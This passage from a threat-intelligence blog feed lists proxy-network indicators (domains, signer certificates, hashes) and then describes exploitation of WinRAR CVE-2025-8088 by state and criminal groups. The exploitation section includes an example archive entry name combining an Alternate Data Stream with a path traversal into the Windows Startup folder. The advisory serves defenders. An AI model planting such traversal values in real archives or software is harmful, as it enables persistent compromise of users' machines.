overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1px" cellpadding="16px" style="border-collapse: collapse; width: 100%; height: 1305.43px;"><colgroup><col style="width: 373px;"/></colgroup> <tbody> <tr style="height: 54.3931px;"> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px; height: 54.3931px;"> <p><span style="vertical-align: baseline;">00857cca77b615c369f48ead5f8eb7f3.com</span></p> </td> </tr> <tr style="height: 54.3931px;"> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px; height: 54.3931px;"> <p><span style="vertical-align: baseline;">0aa0cf0637d66c0d.com</span></p> </td> </tr> <tr style="height: 54.3931px;"> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px; height: 54.3931px;"> <p><span style="vertical-align: baseline;">31d58c226fc5a0aa976e13ca9ecebcc8.com</span></p> </td> </tr> <tr style="height: 54.3931px;"> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px; height: 54.3931px;"> <p><span style="vertical-align: baseline;">3k7m1n9p4q2r6s8t0v5w2x4y6z8u9.com</span></p> </td> </tr> <tr style="height: 54.3931px;"> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px; height: 54.3931px;"> <p><span style="vertical-align: baseline;">442fe7151fb1e9b5.com</span></p> </td> </tr> <tr style="height: 54.3931px;"> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px; height: 54.3931px;"> <p><span style="vertical-align: baseline;">6b86b273ff34fce1.online</span></p> </td> </tr> <tr style="height: 54.3931px;"> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px; height: 54.3931px;"> <p><span style="vertical-align: baseline;">7x2k9n4p1q0r5s8t3v6w0y2z4u7b9.com</span></p> </td> </tr> <tr style="height: 54.3931px;"> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px; height: 54.3931px;"> <p><span style="vertical-align: baseline;">8b21a945159f23b740c836eb50953818.com</span></p> </td> </tr> <tr style="height: 54.3931px;"> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px; height: 54.3931px;"> <p><span style="vertical-align: baseline;">8f00b204e9800998.com</span></p> </td> </tr> <tr style="height: 54.3931px;"> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px; height: 54.3931px;"> <p><span style="vertical-align: baseline;">a7b37115ce3cc2eb.com</span></p> </td> </tr> <tr style="height: 54.3931px;"> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px; height: 54.3931px;"> <p><span style="vertical-align: baseline;">a8d3b9e1f5c7024d6e0b7a2c9f1d83e5.com</span></p> </td> </tr> <tr style="height: 54.3931px;"> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px; height: 54.3931px;"> <p><span style="vertical-align: baseline;">aa86a52a98162b7d.com</span></p> </td> </tr> <tr style="height: 54.3931px;"> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px; height: 54.3931px;"> <p><span style="vertical-align: baseline;">af4760df2c08896a9638e26e7dd20aae.com</span></p> </td> </tr> <tr style="height: 54.3931px;"> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px; height: 54.3931px;"> <p><span style="vertical-align: baseline;">asdk2​.com</span></p> </td> </tr> <tr style="height: 54.3931px;"> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px; height: 54.3931px;"> <p><span style="vertical-align: baseline;">b5e9a2d7f4c8e3b1a0d6f2e9c5b8a7d.com</span></p> </td> </tr> <tr style="height: 54.3931px;"> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px; height: 54.3931px;"> <p><span style="vertical-align: baseline;">bdrv7wlbszfotkqf.uk</span></p> </td> </tr> <tr style="height: 54.3931px;"> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px; height: 54.3931px;"> <p><span style="vertical-align: baseline;">cfe47df26c8eaf0a7c136b50c703e173.com</span></p> </td> </tr> <tr style="height: 54.3931px;"> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px; height: 54.3931px;"> <p><span style="vertical-align: baseline;">hexsdk.com</span></p> </td> </tr> <tr style="height: 54.3931px;"> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px; height: 54.3931px;"> <p><span style="vertical-align: baseline;">e4f8c1b9a2d7e3f6c0b5a8d9e2f1c4d.com</span></p> </td> </tr> <tr style="height: 54.3931px;"> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px; height: 54.3931px;"> <p><span style="vertical-align: baseline;">packetsdk.io</span></p> </td> </tr> <tr style="height: 54.3931px;"> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px; height: 54.3931px;"> <p><span style="vertical-align: baseline;">packetsdk.net</span></p> </td> </tr> <tr style="height: 54.3931px;"> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px; height: 54.3931px;"> <p><span style="vertical-align: baseline;">packetsdk.xyz</span></p> </td> </tr> <tr style="height: 54.3931px;"> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px; height: 54.3931px;"> <p><span style="vertical-align: baseline;">v46wd6uramzkmeeo.in</span></p> </td> </tr> <tr style="height: 54.3931px;"> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px; height: 54.3931px;"> <p><span style="vertical-align: baseline;">willmam.com</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div></div> <div class="block-paragraph_advanced"><h4>File Indicators</h4></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: baseline;">Cert</span></strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">SIGNER_IDENTITY=/1.3.6.1.4.1.311.60.2.1.3=HK/businessCategory=Private Organization/serialNumber=69878507/C=HK/L=Hong Kong Island/O=HONGKONG LINGYUN MDT INFOTECH LIMITED/CN=HONGKONG LINGYUN MDT INFOTECH LIMITED</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">SIGNER_IDENTITY=/businessCategory=Private Organization/1.3.6.1.4.1.311.60.2.1.3=HK/serialNumber=2746134/C=HK/L=Wan Chai/O=HONGKONG LINGYUN MDT INFOTECH LIMITED/CN=HONGKONG LINGYUN MDT INFOTECH LIMITED</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">SIGNER_IDENTITY=/1.3.6.1.4.1.311.60.2.1.3=HK/businessCategory=Private Organization/serialNumber=74092936/C=HK/L=HONG KONG ISLAND/O=FIRENET LIMITED/CN=FIRENET LIMITED</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">SIGNER_IDENTITY=/1.3.6.1.4.1.311.60.2.1.3=HK/businessCategory=Private Organization/serialNumber=3157599/C=HK/L=Wan Chai/O=FIRENET LIMITED/CN=FIRENET LIMITED</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">SIGNER_IDENTITY=/1.3.6.1.4.1.311.60.2.1.3=HK/businessCategory=Private Organization/serialNumber=74097562/C=HK/L=Hong Kong Island/O=PRINCE LEGEND LIMITED/CN=PRINCE LEGEND LIMITED</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">SIGNER_IDENTITY=/1.3.6.1.4.1.311.60.2.1.3=HK/businessCategory=Private Organization/serialNumber=73874246/C=HK/L=Kowloon/O=MARS BROTHERS LIMITED/CN=MARS BROTHERS LIMITED</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">SIGNER_IDENTITY=/1.3.6.1.4.1.311.60.2.1.3=HK/businessCategory=Private Organization/serialNumber=3135905/C=HK/L=Cheung Sha Wan/O=MARS BROTHERS LIMITED/CN=MARS BROTHERS LIMITED</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">SIGNER_IDENTITY=/1.3.6.1.4.1.311.60.2.1.3=HK/businessCategory=Private Organization/serialNumber=3222394/C=HK/L=WAN CHAI/O=DATALABS LIMITED/CN=DATALABS LIMITED</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div></div> <div class="block-paragraph_advanced"><h4>Example Hashes</h4></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table style="width: 102.444%;"><colgroup><col style="width: 13.3797%;"/><col style="width: 10.3255%;"/><col style="width: 76.2135%;"/></colgroup> <tbody> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: baseline;">File Type</span></strong></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: baseline;">Description</span></strong></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: baseline;">SHA-256</span></strong></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">DLL</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Packet SDK package found inside other applications</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">aef34f14456358db91840c416e55acc7d10185ff2beb362ea24697d7cdad321f</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">APK</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Application with Packet SDK Code</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">b0726bdd53083968870d0b147b72dad422d6d04f27cd52a7891d038ee83aef5b</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">APK</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Application with Hex SDK Code</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">2d1891b6d0c158ad7280f0f30f3c9d913960a793c6abcda249f9c76e13014e45</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">EXE</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Radish VPN Client</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">59cbdecfc01eba859d12fbeb48f96fe3fe841ac1aafa6bd38eff92f0dcfd4554</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">EXE</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">ABC S5 Proxy Client</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">ba9b1f4cc2c7f4aeda7a1280bbc901671f4ec3edaa17f1db676e17651e9bff5f</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">EXE</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Luna Proxy Client</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">01ac6012d4316b68bb3165ee451f2fcc494e4e37011a73b8cf2680de3364fcf4</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div></div>Wed, 28 Jan 2026 14:00:00 +0000https://cloud.google.com/blog/topics/threat-intelligence/disrupting-largest-residential-proxy-network/Threat IntelligencearticleGooglehttps://cloud.google.com/blog/topics/threat-intelligence/disrupting-largest-residential-proxy-network/Google Threat Intelligence Group https://cloud.google.com/blog/topics/threat-intelligence/exploiting-critical-winrar-vulnerability/<div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Introduction</span><strong style="vertical-align: baseline;"> </strong></h3> <p><span style="vertical-align: baseline;">The Google Threat Intelligence Group (GTIG) has identified widespread, active exploitation of the critical vulnerability </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-8088" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">CVE-2025-8088</span></a><span style="vertical-align: baseline;"> in WinRAR, a popular file archiver tool for Windows, to establish initial access and deliver diverse payloads. Discovered and patched in July 2025, government-backed threat actors linked to Russia and China as well as financially motivated threat actors continue to exploit this n-day across disparate operations. The consistent exploitation method, a path traversal flaw allowing files to be dropped into the Windows Startup folder for persistence, underscores a defensive gap in fundamental application security and user awareness.</span></p> <p><span style="vertical-align: baseline;">In this blog post, we provide details on CVE-2025-8088 and the typical exploit chain, highlight exploitation by financially motivated and state-sponsored espionage actors, and provide IOCs to help defenders detect and hunt for the activity described in this post.</span></p> <p><span style="vertical-align: baseline;">To protect against this threat, we urge organizations and users to keep software fully up-to-date and to install security updates as soon as they become available. After a vulnerability has been patched, malicious actors will continue to rely on n-days and use slow patching rates to their advantage. We also recommend the use of </span><a href="https://safebrowsing.google.com/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Google Safe Browsing</span></a><span style="vertical-align: baseline;"> and Gmail, which actively identifies and blocks files containing the exploit.</span></p> <h3><span style="vertical-align: baseline;">Vulnerability and Exploit Mechanism</span></h3> <p><span style="vertical-align: baseline;">CVE-2025-8088 is a high-severity path traversal vulnerability in WinRAR that attackers exploit by leveraging Alternate Data Streams (ADS). Adversaries can craft malicious RAR archives which, when opened by a vulnerable version of WinRAR, can write files to arbitrary locations on the system. Exploitation of this vulnerability in the wild </span><a href="https://www.welivesecurity.com/en/eset-research/update-winrar-tools-now-romcom-and-others-exploiting-zero-day-vulnerability/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">began as early</span></a><span style="vertical-align: baseline;"> as July 18, 2025, and the vulnerability was addressed by RARLAB with the release of </span><a href="https://www.win-rar.com/singlenewsview.html?&amp;L=0&amp;tx_ttnews%5Btt_news%5D=283&amp;cHash=a64b4a8f662d3639dec8d65f47bc93c5" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">WinRAR version 7.13</span></a><span style="vertical-align: baseline;"> shortly after, on July 30, 2025.</span></p> <p><span style="vertical-align: baseline;">The exploit chain often involves concealing the malicious file within the ADS of a decoy file inside the archive. While the user typically views a decoy document (such as a PDF) within the archive, there are also malicious ADS entries, some containing a hidden payload while others are dummy data.</span></p> <p><span style="vertical-align: baseline;">The payload is written with a specially crafted path designed to traverse to a critical directory, frequently targeting the Windows Startup folder for persistence. The key to the path traversal is the use of the ADS feature combined with directory traversal characters. </span></p> <p><span style="vertical-align: baseline;">For example, a file within the RAR archive might have a composite name like </span><code style="vertical-align: baseline;">innocuous.pdf:malicious.lnk</code><span style="vertical-align: baseline;"> combined with a malicious path: </span><code style="vertical-align: baseline;">../../../../../Users/&lt;user&gt;/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/malicious.lnk</code><span style="vertical-align: baseline;">. </span></p> <p><span style="vertical-align: baseline;">When the archive is opened, the ADS content (</span><code style="vertical-align: baseline;">malicious.lnk</code><span style="vertical-align: baseline;">) is extracted to the destination specified by the traversal path, automatically executing the payload the next time the user logs in.</span></p> <h3><span style="vertical-align: baseline;">State-Sponsored Espionage Activity</span></h3> <p><span style="vertical-align: baseline;">Multiple government-backed actors have adopted the CVE-2025-8088 exploit, predominantly focusing on military, government, and technology targets. This is similar to the</span><a href="https://blog.google/threat-analysis-group/government-backed-actors-exploiting-winrar-vulnerability/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;"> widespread exploitation of a known WinRAR bug in 2023, CVE-2023-38831</span></a><span style="vertical-align: baseline;">, highlighting that exploits for known vulnerabilities can be highly effective, despite a patch being available.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/critical-winrar-exploitation-fig1.max-1000x1000.png" alt="Timeline of notable observed exploitation"> </a> <figcaption class="article-image__caption "><p data-block-key="jd7fg">Figure 1: Timeline of notable observed exploitation</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Russia-Nexus Actors Targeting Ukraine</span></h4> <p><span style="vertical-align: baseline;">Suspected Russia-nexus threat groups are consistently exploiting CVE-2025-8088 in campaigns targeting Ukrainian military and government entities, using highly tailored geopolitical lures.</span></p> <ul> <li><strong style="vertical-align: baseline;">UNC4895 (CIGAR)</strong><span style="vertical-align: baseline;">: UNC4895 (also publicly reported as RomCom) is a dual financial and espionage-motivated threat group whose </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/cybercrime-multifaceted-national-security-threat?e=48754805"><span style="text-decoration: underline; vertical-align: baseline;">campaigns</span></a><span style="vertical-align: baseline;"> often involve spearphishing emails with lures tailored to the recipient. We observed subjects indicating targeting of Ukrainian military units. The final payload belongs to the NESTPACKER malware family (externally known as Snipbot).</span></li> </ul></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/critical-winrar-exploitation-fig2.max-1000x1000.png" alt="Ukrainian language decoy document from UNC4895 campaign"> </a> <figcaption class="article-image__caption "><p data-block-key="jd7fg">Figure 2: Ukrainian language decoy document from UNC4895 campaign</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">APT44 (FROZENBARENTS)</strong><span style="vertical-align: baseline;">: This Russian APT group exploits CVE-2025-8088 to drop a decoy file with a Ukrainian filename, as well as a malicious LNK file that attempts further downloads.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">TEMP.Armageddon (CARPATHIAN)</strong><span style="vertical-align: baseline;">: This actor, also targeting Ukrainian government entities, uses RAR archives to drop HTA files into the Startup folder. The HTA file acts as a downloader for a second stage. The initial downloader is typically contained within an archive packed inside an HTML file. This activity has continued through January 2026.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Turla (SUMMIT)</strong><span style="vertical-align: baseline;">: This actor adopted CVE-2025-8088 to deliver the STOCKSTAY malware suite. Observed lures are themed around Ukrainian military activities and drone operations.</span></p> </li> </ul> <h4><span style="vertical-align: baseline;">China-Nexus Actors</span></h4> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">A PRC-based actor is exploiting the vulnerability to deliver POISONIVY malware via a BAT file dropped into the Startup folder, which then downloads a dropper.</span></p> </li> </ul> <h3><span style="vertical-align: baseline;">Financially Motivated Activity</span></h3> <p><span style="vertical-align: baseline;">Financially motivated threat actors also quickly adopted the vulnerability to deploy commodity RATs and information stealers against commercial targets.</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">A group that has targeted entities in Indonesia using lure documents used this vulnerability to drop a .cmd file into the Startup folder. This script then downloads a password-protected RAR archive from Dropbox, which contains a backdoor that communicates with a Telegram bot command and control.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">A group known for targeting the hospitality and travel sectors, particularly in LATAM, is using phishing emails themed around hotel bookings to eventually deliver commodity RATs such as XWorm and AsyncRAT.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">A group targeting Brazilian users via banking websites delivered a malicious Chrome extension that injects JavaScript into the pages of two Brazilian banking sites to display phishing content and steal credentials.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">In December and January 2026, we have continued to observe malware being distributed by cyber crime exploiting CVE-2025-8088, including commodity RATS and stealers. </span></p> </li> </ul> <h4><span style="vertical-align: baseline;">The Underground Exploit Ecosystem: Suppliers Like "zeroplayer"</span></h4> <p><span style="vertical-align: baseline;">The widespread use of CVE-2025-8088 by diverse actors highlights the demand for effective exploits. This demand is met by the underground economy where individuals and groups specialize in developing and selling exploits to a range of customers. A notable example of such an upstream supplier is the actor known as "zeroplayer," who advertised a WinRAR exploit in July 2025. </span></p> <p><span style="vertical-align: baseline;">The WinRAR vulnerability is not the only exploit in zeroplayer’s arsenal. Historically, and in recent months, zeroplayer has continued to offer other high-priced exploits that could potentially allow threat actors to bypass security measures. The actor’s advertised portfolio includes the following among others:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">In November 2025, zeroplayer claimed to have a sandbox escape RCE zero-day exploit for Microsoft Office advertising it for $300,000. </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">In late September 2025, zeroplayer advertised a RCE zero-day exploit for a popular, unnamed corporate VPN provider; the price for the exploit was not specified.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Starting in mid-October 2025, zeroplayer advertised a zero-day Local Privilege Escalation (LPE) exploit for Windows listing its price as $100,000.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">In early September 2025, zeroplayer advertised a zero-day exploit for a vulnerability that exists in an unspecified drive that would allow an attacker to disable antivirus (AV) and endpoint detection and response (EDR) software; this exploit was advertised for $80,000.</span></p> </li> </ul> <p><span style="vertical-align: 